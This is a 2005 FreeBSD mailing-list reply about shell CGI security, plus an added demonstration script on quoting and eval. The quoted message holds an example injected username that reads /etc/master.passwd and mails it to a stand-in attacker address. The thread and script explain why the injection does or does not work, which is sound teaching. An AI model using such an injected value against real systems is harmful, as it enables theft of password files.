From owner-freebsd-questions@FreeBSD.ORG Sat Feb 5 04:13:50 2005
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6E0AC16A4CE; Sat, 5 Feb 2005 04:13:50 +0000 (GMT)
Received: from dan.emsphone.com (dan.emsphone.com [199.67.51.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0271543D41; Sat, 5 Feb 2005 04:13:50 +0000 (GMT) (envelope-from dan@dan.emsphone.com)
Received: (from dan@localhost) by dan.emsphone.com (8.13.1/8.13.1) id j154DjoU026898; Fri, 4 Feb 2005 22:13:45 -0600 (CST) (envelope-from dan)
Date: Fri, 4 Feb 2005 22:13:45 -0600
From: Dan Nelson
To: "Loren M. Lang"
Message-ID: <20050205041344.GK25463@dan.emsphone.com>
References: <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <20050125194736.GD76109@xor.obsecurity.org> <20050205034440.GF8619@alzatex.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050205034440.GF8619@alzatex.com>
X-OS: FreeBSD 5.3-STABLE
X-message-flag: Outlook Error
User-Agent: Mutt/1.5.6i
cc: Paul Schmehl
cc: "Donald J. O'Neill"
cc: Warren
cc: Gert Cuykens
cc: Kris Kennaway
cc: freebsd-questions@freebsd.org
Subject: Re: perl and ports
X-BeenThere: freebsd-questions@freebsd.org
X-Mailman-Version: 2.1.1
Precedence: list
List-Id: User questions
X-List-Received-Date: Sat, 05 Feb 2005 04:13:50 -0000

In the last episode (Feb 04), Loren M. Lang said:
> Actually, I think you should work on sh first; it's a much bigger
> security hazard than perl. If you've ever written much sh, you'd
> realize that with its much looser syntax, it's easy to get into trouble.
> At least perl provides use strict and -Tw. Someone using sh to write
> cgi scripts is the worst. Imagine someone writing the following like
> for a sh cgi script where $USERNAME is a cgi parameter passed into
> the following script:
>
> echo "Welcome, " $USERNAME ""
>
> What if someone wrote the following username and apache was running as
> root:
>
> charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo

Then you would get a web page containing:

Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo .

The shell doesn't re-interpret its input unless explicitly told to via
the "eval" command.  /bin/sh is a little limited for more complex
scripts due to its lack of arrays, though, so zsh/ksh/bash are much
better choices :)

-- 
	Dan Nelson
	dnelson@allantgroup.com
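The point Dan makes above, as an added example that is not part of the original thread: a value held in a shell variable is expanded, not parsed, so the `echo` line from the quoted CGI script only prints its input. Two things a reviewer should still check are (a) an unquoted expansion is subject to word splitting and pathname globbing, so a username of `*` leaks directory listings into the page, which double quotes around `$USERNAME` prevent, and (b) `eval` is the one construct that does re-parse the text as commands. The functions, the `INJECTED` marker and the `secret_*` file names are all constructed here for illustration.

```shell
#!/bin/sh
# Added example (not from the original mailing-list thread). The USERNAME
# values passed in below are constructed; nothing here reads real data.

# 1. Unquoted expansion, as written in the quoted CGI script. The value is
#    word-split and glob-expanded, but never executed as a command.
greet_unquoted() {
    USERNAME=$1
    echo "Welcome, " $USERNAME ""
}

# 2. Quoted expansion: no word splitting, no globbing. This is the form to
#    use when the value comes from a request.
greet_quoted() {
    USERNAME=$1
    echo "Welcome, $USERNAME"
}

# 3. Only eval re-parses the text as shell code; this is the pattern to
#    flag in any script that touches untrusted input.
greet_eval() {
    USERNAME=$1
    eval "echo Welcome, $USERNAME"
}

# Globbing pitfall of form 1, shown in a scratch directory holding two
# constructed file names: a username of "*" expands to the file list.
glob_demo() {
    dir=$(mktemp -d)
    touch "$dir/secret_a" "$dir/secret_b"
    ( cd "$dir" && greet_unquoted '*' )
    rm -rf "$dir"
}

# Demonstration when run directly.
greet_unquoted 'charlie; echo INJECTED'   # printed literally, one line
greet_quoted   'charlie; echo INJECTED'   # printed literally, one line
glob_demo                                 # Welcome,  secret_a secret_b
greet_quoted   '*'                        # Welcome, *
greet_eval     'charlie; echo INJECTED'   # second line "INJECTED" appears
```

Running it shows the first two calls echo the command-looking text unchanged; only `greet_eval` produces a separate `INJECTED` line, and only `greet_unquoted` turns `*` into file names.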